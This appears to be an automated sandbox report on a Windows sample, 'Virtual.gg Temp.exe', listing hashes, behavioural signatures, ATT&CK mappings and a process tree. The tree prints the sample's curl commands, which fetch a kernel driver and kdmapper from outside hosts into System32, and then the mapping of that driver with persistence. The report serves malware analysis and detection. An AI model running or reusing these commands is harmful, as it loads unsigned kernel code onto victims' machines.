Analysis
- max time kernel
148s - max time network
129s - platform
windows11-ltsc_2024_x64 - resource
win11ltsc2024-20260709-en - resource tags
arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows - submitted
06/08/2026, 19:17
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
Virtual.gg Temp.exe
Resource
win10v2004-20260513-en
10 signatures
150 seconds
Behavioral task
behavioral2
Sample
Virtual.gg Temp.exe
Resource
win11ltsc2024-20260709-en
11 signatures
150 seconds
General
- Target Virtual.gg Temp.exe
- Size 55KB
- Sample260806-xzcs2ayfkh
- SHA256 a5c9eedbb84735f5a17f6afe46b678e06aad42162265166cde17163dbe7001da
- MD5 1ec9ec365d0059ed1fc4f92953d44097
- SHA1 04fd33c640122990d8071325a2d05706726047d5
- SHA512 32a1b4a04ea3108efb1afbcf327cf3a0a92f1dc728a6f97c375c426cf8029f56e0d7999615ab2df84e6de24b2d5db65035b368aefc1f94eab17307dc9c130ceb
- SSDEEP 768:J3U4uqWNsUgBHuy7p2FFNLOZgCC3r7xQs+LWgRfN7Wf9Imshi+JQEcUYkzsGp6gr:lrWNS9uy7+jbxIhY+JSUWGp6bint
- TLSH T1DD434B2B6B9504FCE4B792BDE5B78953E271780907615ACF07D081666F632E0AE36B03
- MD5 SHA1 SHA512 SSDEEP TLSH
Score
8/10
Malware Config
Signatures
- Downloads MZ/PE file 2 IoCs
flow pid Process 8 124 curl.exe 15 4324 curl.exe - Sets service image path in registry 3 TTPs 1 IoCs
This determines the executable launched when a service starts. It can be used to establish persistence.
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\atSCcXPtnJBFWuPZIdjG\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\atSCcXPtnJBFWuPZIdjG" kdmapper.exe - Executes dropped EXE 1 IoCs
pid Process 2576 kdmapper.exe - Contacts third-party web service commonly abused for C2 1 TTPs 2 IoCs
Legitimate web (hosting) services can be abused by malware authors to host malware or C2s.
flow ioc 15 raw.githubusercontent.com 1 raw.githubusercontent.com - Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\mom4mf.sys curl.exe File created C:\Windows\System32\kdmapper.exe curl.exe - Executes a command shell one-liner 1 TTPs 5 IoCs
Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.
pid Process 4136 cmd.exe 296 cmd.exe 52 cmd.exe 4300 cmd.exe 1516 cmd.exe - Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2576 kdmapper.exe 2576 kdmapper.exe - Suspicious behavior: LoadsDriver 1 IoCs
pid Process 2576 kdmapper.exe - Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2576 kdmapper.exe Token: SeLoadDriverPrivilege 2576 kdmapper.exe - Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5596 wrote to memory of 296 5596 Virtual.gg Temp.exe 91 PID 5596 wrote to memory of 52 5596 Virtual.gg Temp.exe 92 PID 5596 wrote to memory of 4300 5596 Virtual.gg Temp.exe 93 PID 4300 wrote to memory of 124 4300 cmd.exe 94 PID 5596 wrote to memory of 1516 5596 Virtual.gg Temp.exe 95 PID 1516 wrote to memory of 4324 1516 cmd.exe 96 PID 5596 wrote to memory of 2576 5596 Virtual.gg Temp.exe 97 PID 5596 wrote to memory of 4136 5596 Virtual.gg Temp.exe 98 - cURL User-Agent 3 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 8 curl/8.8.0 HTTP User-Agent header 10 curl/8.8.0 HTTP User-Agent header 15 curl/8.8.0
Processes
-
C:\Users\Admin\AppData\Local\Temp\Virtual.gg Temp.exe"C:\Users\Admin\AppData\Local\Temp\Virtual.gg Temp.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5596 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
- Executes a command shell one-liner
PID:296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
- Executes a command shell one-liner
PID:52
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z6eV_3lsF39IcHa1/km.sys --output C:\Windows\System32\mom4mf.sys >nul 2>&12⤵
- Executes a command shell one-liner
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z6eV_3lsF39IcHa1/km.sys --output C:\Windows\System32\mom4mf.sys3⤵
- Downloads MZ/PE file
- Drops file in System32 directory
PID:124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -L --silent https://github.com/R3L8ntLe55/map/raw/refs/heads/main/kdmapper_Release.exe --output C:\Windows\System32\kdmapper.exe >nul 2>&12⤵
- Executes a command shell one-liner
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\curl.execurl -L --silent https://github.com/R3L8ntLe55/map/raw/refs/heads/main/kdmapper_Release.exe --output C:\Windows\System32\kdmapper.exe3⤵
- Downloads MZ/PE file
- Drops file in System32 directory
PID:4324
-
-
-
C:\Windows\System32\kdmapper.exe"C:\Windows\System32\kdmapper.exe" C:\Windows\System32\mom4mf.sys2⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
- Executes a command shell one-liner
PID:4136
-
Network
MITRE ATT&CK Enterprise v16
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
- Path C:\Windows\System32\kdmapper.exe
- Size 150KB
- SHA256 611b7cf5d5f9193cf7ba27260f4b7903fc0b29c8791d4e4ca2881ff14feb636d
- MD5 61e5aafec83b8c4d6b310dc54ed4c827
- SHA1 fa0c68418265677b6d7ab4fe07a26340482dfb25
- SHA512 7545ad1265c4871900357ecac0598a9db0fd8c627879726d9afe4b9344387df2270d761575de5c445503d2b859d50bd51f9c082fb96095186d9f3ab1ada5cc46
- SSDEEP 3072:soRUjZEYLIDfVEDykwUmJTQSaMm5/6onTxIl4z:NUZEYLqf4jcWlTh
- TLSH T1D1E32A1797A5106EF1B7D6B9CAB24A11EB717C550B74D2CF135048BA0F22BD0BA3EB12
- MD5 SHA1 SHA512 SSDEEP TLSH
- Path C:\Windows\System32\mom4mf.sys
- Size 18KB
- SHA256 c607b47707c9d3225ae26ffcd78632565e71278aed9aaa98e4462740cc0c8337
- MD5 e1035caa4653d64afb853525d3e774a2
- SHA1 5ea97a005fd7fed2f1e45c023e444f72ca4a3f44
- SHA512 8c31122c1911d0e3ea86d8f708cdbbd33ed97182afd8c358849dbfc5cfb0137c043f80ac73b39598040b310a723f4815f1b41e4faf5b33355276ff2a4d9ad5e1
- SSDEEP 384:yLLSZyKnhmcY3xqZEzPFyKLyjpC73fDM56nehV3m6C5ubW8Y:yLxKn4cYYZEzPFvLyjpEvg56neX9bW
- TLSH T1C1825C82219590F1F2798D3A86728936E271FC021711FEDF1EA0962D1F73FD10A39A57
- MD5 SHA1 SHA512 SSDEEP TLSH